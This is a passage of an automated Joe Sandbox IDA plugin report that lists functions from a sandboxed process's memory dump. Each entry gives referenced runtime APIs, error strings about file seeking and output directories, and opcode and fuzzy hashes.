Opcode ID: 965789e697c5e316f282bbceb3551a867fbc8126102b282dd290399e8b9774d7
Instruction ID: 05bf5ee91cc92a9831c295523992d2483e3b5ef7bf1deca5eed8b4ee9bbad693
Opcode Fuzzy Hash: 965789e697c5e316f282bbceb3551a867fbc8126102b282dd290399e8b9774d7
Instruction Fuzzy Hash: 8801F47A980105ABCB117BB8A8927BFBB699FD6331F108327F911A23D2CB315C4556A0

Uniqueness

Uniqueness Score: -1.00%

Function 009E48E3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 481COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E48E8

Part of subcall function 009E41B9: __EH_prolog.LIBCMT ref: 009E41BE

Part of subcall function 009E4329: __EH_prolog.LIBCMT ref: 009E432E

Part of subcall function 009F24E9: __EH_prolog.LIBCMT ref: 009F24EE

Part of subcall function 009E44BA: __EH_prolog.LIBCMT ref: 009E44BF

Part of subcall function 009E45B7: __EH_prolog.LIBCMT ref: 009E45BC

Strings

Cannot seek to begin of file, xrefs: 009E4E08

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID: Cannot seek to begin of file
API String ID: 3519838083-2298593816
Opcode ID: 41ea51856a98ad70ec17a3a75975dc4260c2b231984d7eac04cb59d576e39ebf
Instruction ID: 7bd1f38971258c491eba4fb5dfd51469ad755d8d5c8cc5158edeb02dfa5ac552
Opcode Fuzzy Hash: 41ea51856a98ad70ec17a3a75975dc4260c2b231984d7eac04cb59d576e39ebf
Instruction Fuzzy Hash: 581225319003859FCF26DFA5C484BEEBBF9AF95314F14441EE446A7292CB70AE84CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009F1ADA Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 388COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009F1ADF

Part of subcall function 009D5B2F: __EH_prolog.LIBCMT ref: 009D5B34

Part of subcall function 009E2EE5: _CxxThrowException.MSVCRT(?,00A4FFC8), ref: 009E2F13

Part of subcall function 009D9312: VariantClear.OLEAUT32(?), ref: 009D9334

Strings

Cannot create output directory, xrefs: 009F1E6F

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$ClearExceptionThrowVariant
String ID: Cannot create output directory
API String ID: 814188403-1181934277
Opcode ID: 7a9bb260b6edaf83e6a79fdf005495721392177ae13d0acd360874c6f50a73d9
Instruction ID: 178af453373e251509fff6193a18253ca49cd5937f5b3ccb60e731a1022deb71
Opcode Fuzzy Hash: 7a9bb260b6edaf83e6a79fdf005495721392177ae13d0acd360874c6f50a73d9
Instruction Fuzzy Hash: CFF1B07190428DEFCF25EFA4C890AFEBBB9BF99300F14805AE54567251DB309E45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A0B618 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

fputs.MSVCRT ref: 00A0B681

Part of subcall function 009D25C7: _CxxThrowException.MSVCRT(?,00A4FFC8), ref: 009D25E9

Strings

, xrefs: 00A0B650

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ExceptionThrowfputs
String ID:
API String ID: 1334390793-399585960
Opcode ID: a9215aaee73f4b27f713970c67f19b76878f4e54cb794b9158e06f267876de42
Instruction ID: 28d74beb70a12b8cc08d9216766bd56755e44172a210f8f679292a2eed1e5c44
Opcode Fuzzy Hash: a9215aaee73f4b27f713970c67f19b76878f4e54cb794b9158e06f267876de42
Instruction Fuzzy Hash: 6511EF716047449FDB15CF59D8C1B6ABBE6EF89304F04816EE1468B290C7B2B804CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A04E72 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00A04EE1

Strings

Open, xrefs: 00A04F0B

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs
String ID: Open
API String ID: 1795875747-71445658
Opcode ID: bf2ea44cbafc386a6ead144bfd9141a659c05bdb4bd646025183e71736ba1ab7
Instruction ID: 8808118bd7216dff14610ddcf470c42df0ee19d66a9b5aee990ad6b8903886c1
Opcode Fuzzy Hash: bf2ea44cbafc386a6ead144bfd9141a659c05bdb4bd646025183e71736ba1ab7
Instruction Fuzzy Hash: C011A0765057049FC760EF78E991ADAB7A5FBA5320F008A2EE69A43291DB31A804CF50

Uniqueness

Uniqueness Score: -1.00%

Function 009E45B7 Relevance: 3.3, APIs: 2, Instructions: 253COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E45BC

Part of subcall function 009D69AB: __EH_prolog.LIBCMT ref: 009D69B0

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$free
String ID:
API String ID: 2654054672-0
Opcode ID: 471992c9e3178002aeb9c29f122b716aaef20a6a177c5a6b80f1bd8ef35ea26c
Instruction ID: 7032595b9753264a42ed6aa010d00c6566f149fc6bf6a815d58617cfbfb9b3a1
Opcode Fuzzy Hash: 471992c9e3178002aeb9c29f122b716aaef20a6a177c5a6b80f1bd8ef35ea26c
Instruction Fuzzy Hash: 3891F335900185AFCF22EFA5D881BEEBBB6AFD5300F10846AF942A7351DB319D44DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A1C5F8 Relevance: 3.2, APIs: 2, Instructions: 206COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A1C5FD
_CxxThrowException.MSVCRT(?,00A58128), ref: 00A1C83C

Part of subcall function 009D1E55: malloc.MSVCRT ref: 009D1E68
Part of subcall function 009D1E55: _CxxThrowException.MSVCRT(?,00A50098), ref: 009D1E82

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ExceptionThrow$H_prologmalloc
String ID:
API String ID: 3044594480-0
Opcode ID: 59093eb81051174378613fd837229662f0240f2426651847eed4f78a503c2c26
Instruction ID: 6e7b20f7658de7743a49a550c732bdc68965c70cb6df04f887d89414567f3a15
Opcode Fuzzy Hash: 59093eb81051174378613fd837229662f0240f2426651847eed4f78a503c2c26
Instruction Fuzzy Hash: 8191AF75D00259DFCF21DFA8C981AEEBBB5BF48310F14819AE455A7251CB30AE85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 009E5E89 Relevance: 3.1, APIs: 2, Instructions: 138COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E5E8E

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 6312e59278331d31c05f017fca00a711b0cbfe142d65625ac30094d235c12e3d
Instruction ID: 237093a960e6f4dc8e5a118afd2df657baefb7cd68191c06047d23c0fb803bd8
Opcode Fuzzy Hash: 6312e59278331d31c05f017fca00a711b0cbfe142d65625ac30094d235c12e3d
Instruction Fuzzy Hash: 7651BCB4504B80AFCB22DB61C490BEABBF5BF85308F15895EE0DA4B202D731AD85CB51

Uniqueness

Uniqueness Score: -1.00%

Function 009D5B2F Relevance: 3.1, APIs: 2, Instructions: 112COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009D5B34

Part of subcall function 009D692E: __EH_prolog.LIBCMT ref: 009D6933
Part of subcall function 009D692E: GetFileAttributesW.KERNELBASE(?,?,?,00000000,?), ref: 009D6953
Part of subcall function 009D692E: GetFileAttributesW.KERNELBASE(?,00000000,?,?,00000000,?), ref: 009D6982

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: AttributesFileH_prolog
String ID:
API String ID: 3244726999-0
Opcode ID: 5cc8591c32f05edf40cea3a85a9f59f20530396fabce32384754c9ca64187a93
Instruction ID: 7e2b5511d4900d8b50f2eb070602faa3d222aa79188328ce325661a7282cad57
Opcode Fuzzy Hash: 5cc8591c32f05edf40cea3a85a9f59f20530396fabce32384754c9ca64187a93
Instruction Fuzzy Hash: E431F531890A06CBCF18FFA4C481AFEB775AFA5300F128467E941B7351EB256D46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 009F683E Relevance: 3.1, APIs: 2, Instructions: 84COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009F6843

Part of subcall function 009D35A7: __EH_prolog.LIBCMT ref: 009D35AC

wcscmp.MSVCRT ref: 009F68D0

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$wcscmp
String ID:
API String ID: 3232955128-0
Opcode ID: 4a6817f901a0ca98be9ef6c0525bf80aed213d9e834be39b3fd3d94f189ab205
Instruction ID: 1ea5fd016f22641a5ee6a132f33617a7a1fd0662a6366040c13dd398a38c2b58
Opcode Fuzzy Hash: 4a6817f901a0ca98be9ef6c0525bf80aed213d9e834be39b3fd3d94f189ab205
Instruction Fuzzy Hash: D7313735D0125AEACF05EFE8E582AEDFBB5BF94304F50816EE415B3291CB305A05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00A1D45B Relevance: 3.0, APIs: 2, Instructions: 39COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A1D460

Part of subcall function 00A1D01D: __EH_prolog.LIBCMT ref: 00A1D022

_CxxThrowException.MSVCRT(?,00A58128), ref: 00A1D4AB

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog$ExceptionThrow
String ID:
API String ID: 2366012087-0
Opcode ID: 6a197ddb986cd4cea1a1745fa4fdb8c9582c1ed1f4c44dfb602ea401a3a0acb7
Instruction ID: 4eac567d1a23e87c1b61c0355fbc98db553379d65ce806e283be4117490bf22c
Opcode Fuzzy Hash: 6a197ddb986cd4cea1a1745fa4fdb8c9582c1ed1f4c44dfb602ea401a3a0acb7
Instruction Fuzzy Hash: 7601AD32904289BFDF128F94C806BEE7FB4EB45364F04455AF9045B222C7B5A9949BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A045E7 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A045EC
fputs.MSVCRT ref: 00A0461C

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

Part of subcall function 009D1E89: free.MSVCRT(?,009F6CD6,00000000,00000000,00000001,?,009D10EB), ref: 009D1E8D

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prologfputcfputsfree
String ID:
API String ID: 195749403-0
Opcode ID: 294b5826590596b25d7138b04a6811cb4774af93cb4554df8cd9a9112c1013bb
Instruction ID: 2973ac1f4b217acdf7c6cefae8773ca623fb5dbf664f1d7feb11609ba698b655
Opcode Fuzzy Hash: 294b5826590596b25d7138b04a6811cb4774af93cb4554df8cd9a9112c1013bb
Instruction Fuzzy Hash: 12F08236810208DFCB05EB94E5067DEBBB4FF98710F10812BE502671E1CF319955CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00A0A3E5 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00A0A3FE

Part of subcall function 009D1FE9: fputc.MSVCRT ref: 009D1FF0

fputs.MSVCRT ref: 00A0A415

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: fputs$fputc
String ID:
API String ID: 1185151155-0
Opcode ID: 81a61750054b8d727c46f1a7788122db1deb14ea12e1909081641237c5b87b53
Instruction ID: 558ebdeed7e7b1e6a6437a01e20e843f391cd89064c78d416d370bb7ab077c46
Opcode Fuzzy Hash: 81a61750054b8d727c46f1a7788122db1deb14ea12e1909081641237c5b87b53
Instruction Fuzzy Hash: C5E0723F3482102EC6146B88BC01C153399EBCA360328003FF940832E08BA32C161FE0

Uniqueness

Uniqueness Score: -1.00%

Function 00A37E10 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

_beginthreadex.MSVCRT ref: 00A37E24
GetLastError.KERNEL32 ref: 00A37E38

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ErrorLast_beginthreadex
String ID:
API String ID: 4034172046-0
Opcode ID: af08b65e8620e8a5044c5dd925bda71ecc97822add92a36278f522af53be78be
Instruction ID: 34a9f9cabe3690f893034a567307198e214e6ec0e39fe56937a8ce6ecb6f1942
Opcode Fuzzy Hash: af08b65e8620e8a5044c5dd925bda71ecc97822add92a36278f522af53be78be
Instruction Fuzzy Hash: 2CE08CB62082126EF320DB649C02FAB62989BA0B00F14446DBA48C6180EA608C00C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 009D9810 Relevance: 3.0, APIs: 2, Instructions: 7COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,009D9831), ref: 009D9815
GetProcessAffinityMask.KERNEL32(00000000), ref: 009D981C

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 5fb9174fdfe27ecc1d27c36c8fc29b00d2ae55a12f5ee7e585010b69520bdab1
Instruction ID: 6a22244c229ba3d996ed444b932bd9c2c2237bf84a3553568d9d22e552367fb9
Opcode Fuzzy Hash: 5fb9174fdfe27ecc1d27c36c8fc29b00d2ae55a12f5ee7e585010b69520bdab1
Instruction Fuzzy Hash: 4AB092BD400100ABDE24DBE09D0CC973B2CAAC62023004444B909C6020C637C0568B20

Uniqueness

Uniqueness Score: -1.00%

Function 009DAEFF Relevance: 2.7, APIs: 2, Instructions: 222COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 009DB0DA
GetLastError.KERNEL32 ref: 009DB141

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ErrorLastmemcpy
String ID:
API String ID: 2523627151-0
Opcode ID: 91c08715a52125e2aa9dbb56248e94370beb7d124419f11d37b591843d068a8f
Instruction ID: 55cbd33df889c23aac4f3e533dc382540f312f9f279e11f32670cf70995ec261
Opcode Fuzzy Hash: 91c08715a52125e2aa9dbb56248e94370beb7d124419f11d37b591843d068a8f
Instruction Fuzzy Hash: 41816671640705DFCB24CF28C980AABB3FABB48350F158A2EE88687B54D730F841CB55

Uniqueness

Uniqueness Score: -1.00%

Function 00A0466F Relevance: 2.5, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00A5A878), ref: 00A04677
LeaveCriticalSection.KERNEL32(00A5A878), ref: 00A046A8

Part of subcall function 00A0B752: GetTickCount.KERNEL32 ref: 00A0B767

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: CriticalSection$CountEnterLeaveTick
String ID:
API String ID: 1056156058-0
Opcode ID: 28dd1f273c262a15f111c7014bbf93833227bd29b1fabea68e62d0b7079f3146
Instruction ID: b55642aef59ef2e984f696e6f18168923b5660fa3ad589da44e6b16b9a40f21f
Opcode Fuzzy Hash: 28dd1f273c262a15f111c7014bbf93833227bd29b1fabea68e62d0b7079f3146
Instruction Fuzzy Hash: 2EE0C979605210CBC304DF24E948D9B77A5ABD9322F0545AEE805873A1C7309849CA62

Uniqueness

Uniqueness Score: -1.00%

Function 009D1E55 Relevance: 2.5, APIs: 2, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 009D1E68
_CxxThrowException.MSVCRT(?,00A50098), ref: 009D1E82

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: ExceptionThrowmalloc
String ID:
API String ID: 2436765578-0
Opcode ID: 52031a863c45a51ecf0addc9c3024f802f627293e62127210a3bb07f5ad307db
Instruction ID: f4ef68ebfdbe05eeb93c4f7c03f54dffe9557c0ebe4e906944fa09ae8131f34f
Opcode Fuzzy Hash: 52031a863c45a51ecf0addc9c3024f802f627293e62127210a3bb07f5ad307db
Instruction Fuzzy Hash: 2FE0EC7554424CBADF509FA0D844B9A3B6C6B11795F40D416FD184E251D671C7948790

Uniqueness

Uniqueness Score: -1.00%

Function 00A16F85 Relevance: 2.2, APIs: 1, Instructions: 653COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A16F8A

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e8d9b89497b205e17eec8d9c338180ebe836d8b376a1e9670cedee26a86af1bd
Instruction ID: 2b4c0f1fe04aa26de0886f8318918e7e2c23052eaf8a23b519cc9544347ff770
Opcode Fuzzy Hash: e8d9b89497b205e17eec8d9c338180ebe836d8b376a1e9670cedee26a86af1bd
Instruction Fuzzy Hash: 07529570908249DFDF11CFA8C984BEDBBB5AF49314F284099E845AB391DB75DE81CB21

Uniqueness

Uniqueness Score: -1.00%

Function 009E4FFE Relevance: 1.9, APIs: 1, Instructions: 377COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 009E5003

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: a5a23fd876c23c1cce397174dd5ab4b29052e4f8b3dee5c781740c0f7ff5b9f5
Instruction ID: dbd3ad0dfa4df3c18b5d0d5ae9892118228d06c86c3e7a3e1d57aa461ea117c0
Opcode Fuzzy Hash: a5a23fd876c23c1cce397174dd5ab4b29052e4f8b3dee5c781740c0f7ff5b9f5
Instruction Fuzzy Hash: FCF1E171504BC1DFCB22DF66C0906AABBE5BF59308F55886EE59A8B311D330AD84CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00A1D01D Relevance: 1.8, APIs: 1, Instructions: 336COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00A1D022

Memory Dump Source

Source File: 0000000B.00000002.2421590869.00000000009D1000.00000020.00000001.01000000.00000008.sdmp, Offset: 009D0000, based on PE: true

Associated: 0000000B.00000002.2421573273.00000000009D0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421632683.0000000000A49000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421652353.0000000000A5A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000B.00000002.2421669111.0000000000A62000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_9d0000_7g.jbxd

Similarity

